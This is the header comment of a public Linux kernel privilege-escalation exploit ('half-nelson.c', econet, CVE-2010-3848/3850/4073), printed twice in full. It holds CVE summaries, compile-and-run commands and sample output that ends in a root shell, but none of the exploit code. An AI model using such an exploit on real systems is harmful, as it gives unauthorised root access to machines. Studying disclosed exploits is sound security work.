Linux Kernel 2.6.36.2 Econet Privilege Escalation Exploit
/*
* half-nelson.c
*
* Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit
* Jon Oberheide <[email protected]>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename...=CVE-2010-3848
*
* Stack-based buffer overflow in the econet_sendmsg function in
* net/econet/af_econet.c in the Linux kernel before 2.6.36.2, when an
* econet address is configured, allows local users to gain privileges by
* providing a large number of iovec structures.
*
* http://cve.mitre.org/cgi-bin/cvename...=CVE-2010-3850
*
* The ec_dev_ioctl function in net/econet/af_econet.c in the Linux kernel
* before 2.6.36.2 does not require the CAP_NET_ADMIN capability, which
* allows local users to bypass intended access restrictions and configure
* econet addresses via an SIOCSIFADDR ioctl call.
*
* http://cve.mitre.org/cgi-bin/cvename...=CVE-2010-4073
*
* The ipc subsystem in the Linux kernel before 2.6.37-rc1 does not
* initialize certain structures, which allows local users to obtain
* potentially sensitive information from kernel stack memory.
*
* Usage:
*
* $ gcc half-nelson.c -o half-nelson -lrt
* $ ./half-nelson
* [+] looking for symbols...
* [+] resolved symbol commit_creds to 0xffffffff81088ad0
* [+] resolved symbol prepare_kernel_cred to 0xffffffff81088eb0
* [+] resolved symbol ia32_sysret to 0xffffffff81046692
* [+] spawning children to achieve adjacent kstacks...
* [+] found parent kstack at 0xffff88001c6ca000
* [+] found adjacent children kstacks at 0xffff88000d10a000 and 0xffff88000d10c000
* [+] lower child spawning a helper...
* [+] lower child calling compat_sys_wait4 on helper...
* [+] helper going to sleep...
* [+] upper child triggering stack overflow...
* [+] helper woke up
* [+] lower child returned from compat_sys_wait4
* [+] parent's restart_block has been clobbered
* [+] escalating privileges...
* [+] launching root shell!
* # id
* uid=0(root) gid=0(root)
*
* Notes:
*
* This exploit leverages three vulnerabilities to escalate privileges.
* The primary vulnerability is a kernel stack overflow, not a stack buffer
* overflow as the CVE description incorrectly states. I believe this is the
* first public exploit for a kernel stack overflow, and it turns out to be
* a bit tricky due to some particulars of the econet vulnerability. A full
* breakdown of the exploit is forthcoming.
*
* Tested on Ubuntu 10.04 LTS (2.6.32-21-generic).
*/
/*
* half-nelson.c
*
* Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit
* Jon Oberheide <[email protected]>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename...=CVE-2010-3848
*
* Stack-based buffer overflow in the econet_sendmsg function in
* net/econet/af_econet.c in the Linux kernel before 2.6.36.2, when an
* econet address is configured, allows local users to gain privileges by
* providing a large number of iovec structures.
*
* http://cve.mitre.org/cgi-bin/cvename...=CVE-2010-3850
*
* The ec_dev_ioctl function in net/econet/af_econet.c in the Linux kernel
* before 2.6.36.2 does not require the CAP_NET_ADMIN capability, which
* allows local users to bypass intended access restrictions and configure
* econet addresses via an SIOCSIFADDR ioctl call.
*
* http://cve.mitre.org/cgi-bin/cvename...=CVE-2010-4073
*
* The ipc subsystem in the Linux kernel before 2.6.37-rc1 does not
* initialize certain structures, which allows local users to obtain
* potentially sensitive information from kernel stack memory.
*
* Usage:
*
* $ gcc half-nelson.c -o half-nelson -lrt
* $ ./half-nelson
* [+] looking for symbols...
* [+] resolved symbol commit_creds to 0xffffffff81088ad0
* [+] resolved symbol prepare_kernel_cred to 0xffffffff81088eb0
* [+] resolved symbol ia32_sysret to 0xffffffff81046692
* [+] spawning children to achieve adjacent kstacks...
* [+] found parent kstack at 0xffff88001c6ca000
* [+] found adjacent children kstacks at 0xffff88000d10a000 and 0xffff88000d10c000
* [+] lower child spawning a helper...
* [+] lower child calling compat_sys_wait4 on helper...
* [+] helper going to sleep...
* [+] upper child triggering stack overflow...
* [+] helper woke up
* [+] lower child returned from compat_sys_wait4
* [+] parent's restart_block has been clobbered
* [+] escalating privileges...
* [+] launching root shell!
* # id
* uid=0(root) gid=0(root)
*
* Notes:
*
* This exploit leverages three vulnerabilities to escalate privileges.
* The primary vulnerability is a kernel stack overflow, not a stack buffer
* overflow as the CVE description incorrectly states. I believe this is the
* first public exploit for a kernel stack overflow, and it turns out to be
* a bit tricky due to some particulars of the econet vulnerability. A full
* breakdown of the exploit is forthcoming.
*
* Tested on Ubuntu 10.04 LTS (2.6.32-21-generic).
*/
